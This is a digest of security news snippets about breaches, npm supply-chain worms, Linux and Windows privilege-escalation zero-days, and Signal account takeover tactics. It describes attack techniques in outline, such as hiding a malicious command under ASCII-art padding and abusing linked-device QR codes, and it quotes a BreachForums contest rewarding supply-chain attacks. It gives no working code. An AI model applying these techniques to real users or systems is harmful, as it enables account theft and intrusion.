Errata
Poland builds its own Signal amid security concerns - Beyond Signal support staff impersonation, the agencies said the attacks can also involve outsiders persuading victims to surrender their verification codes or PINs, or abusing the platform’s Linked Devices feature via QR codes to take control of accounts.
Do fear the Reaper - stealer swipes macOS users’ passwords, wallets, then backdoors them - Assuming that the machine is located elsewhere and the user clicks on the fake tool installer, they open Apple’s Script Editor app via a sneaky link that’s heavily padded with ASCII art and fake terms to push the malicious command far below the visible portion of the window when it loads.
Android Adds Intrusion Logging for Sophisticated Spyware Forensics - The feature, it added, was developed in partnership with Amnesty International and Reporters Without Borders. According to a help document shared by Google, it logs device and network activities on a daily basis, including information about device behavior and the various applications that run on it.
The kinds of activities recorded are listed below
- App activity (e.g., when an app process starts)
- App installations, updates, and uninstalls
- Network connections like starting and stopping Wi-Fi, Bluetooth, DNS lookups, and IP addresses
- File transfers to or from the device over USB
- Changes to system certificates
- When the device is locked or unlocked
Google also noted that the log data is end-to-end encrypted by the device and stored on Google servers. The encryption keys are secured by Google Account password and screen lock credentials, meaning the logs cannot be accessed by any third-party, including Google itself, apart from the device owner.
18-Year-Old NGINX Rewrite Module Flaw Enables Unauthenticated RCE -“An unauthenticated attacker, along with conditions beyond its control, can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process, leading to a restart. Additionally, for systems with Address Space Layout Randomization (ASLR ) disabled, code execution is possible.”
Popular node-ipc npm package compromised to steal credentials - The recent supply-chain attack was detected by multiple application security companies, including Socket, Ox Security, and Upwind, who confirmed the following three versions as malicious:
The FBI Wants to Buy Nationwide Access to License Plate Readers - “The FBI has a crucial need for accessible LPRs to provide a diverse and reliable range of collections across the United States. This data should be available across major highways and in an array of locations for maximum usefulness to law enforcement,” a statement of work, which describes what data the FBI is seeking access to, reads.
Breaches
Foxconn confirms cyberattack claimed by Nitrogen ransomware gang - The incident was confirmed by a Foxconn spokesperson when BleepingComputer asked the company to confirm claims by the Nitrogen ransomware operation earlier this week that they had stolen 8 TB of data and more than 11 million documents. Foxconn is the world’s largest electronics manufacturer, ranked 28th in the Fortune Global 500, manufacturing for Apple, Nvidia, Intel, Google, et al.
Iranian hackers targeted major South Korean electronics maker - Researchers at Symantec say that the threat actor “spent a week inside the network of a major South Korean electronics manufacturer in February 2026.”
Linux
Dirty Frag gets a sequel as Fragnesia hands Linux attackers root-level access - According to researcher Hyunwoo Kim, who uncovered Dirty Frag, “Fragnesia” emerged as an unintended side effect of patches shipped to fix the original Dirty Frag vulnerabilities, adding yet another entry to the long tradition of security fixes accidentally creating new security problems.
Exploit available for new DirtyDecrypt Linux root escalation flaw - This limits the attack surface to Linux distributions that closely follow the latest upstream kernel releases, including Fedora, Arch Linux, and openSUSE Tumbleweed. However, V12’s proof-of-concept exploit has only been tested against Fedora and the mainline Linux kernel.
Shai Hulud
Malware crew TeamPCP open-sources its Shai-Hulud worm on GitHub - “TeamPCP isn’t just spreading malware anymore – they’re spreading capability. By going open source, they’ve handed any willing actor the tools to build their own variant. The copycats are already here,” Ox opined.
Malware crew TeamPCP open-sources its Shai-Hulud worm on GitHub - An npm account compromise infected 314 npm packages with malware, including size-sensor, echarts-for-react, timeago.js, and packages scoped to @antv, in a 22-minute burst of activity in the early hours of Tuesday morning. The most popular impacted package is size-sensor, downloaded 4.2 million times per month, followed by echarts-for-react (3.8 million), @antv/scale (2.2 million) and timeago.js (1.15 million).
Shai-Hulud copycat hits another npm package - A Shai-Hulud copycat has turned up in yet another npm package just five days after TeamPCP open sourced the worm and announced a supply-chain attack competition on BreachForums.
BreachForums & TeamPCP Promote Supply Chain Competition as Cybercrime Gets Gamified - Shai Hulud offers a $1000 USD prize for the largest supply chain competition. Rules:
- You must utilize Shai Hulud Worms
- You must include your Breachforums account handle and proof of your attack
- Largest single or Largest cumulative breach wins.
Windows
Disgruntled researcher releases two more Microsoft zero-days - Nightmare-Eclipse described YellowKey as “one of the most insane discoveries I ever found.” They provided the files, which have to be loaded onto a USB drive, and if the attacker completes the key sequence correctly, they are granted unrestricted shell access to a BitLocker-protected machine.
MiniPlasma Windows 0-Day Enables SYSTEM Privilege Escalation on Fully Patched Systems - “I’m unsure if Microsoft just never patched the issue or the patch was silently rolled back at some point for unknown reasons. The original PoC by Google worked without any changes,” the researcher added. “To highlight this issue, I weaponized the original PoC to spawn a SYSTEM shell. It seems to work reliably in my machines but success rate may vary since it’s a race condition.”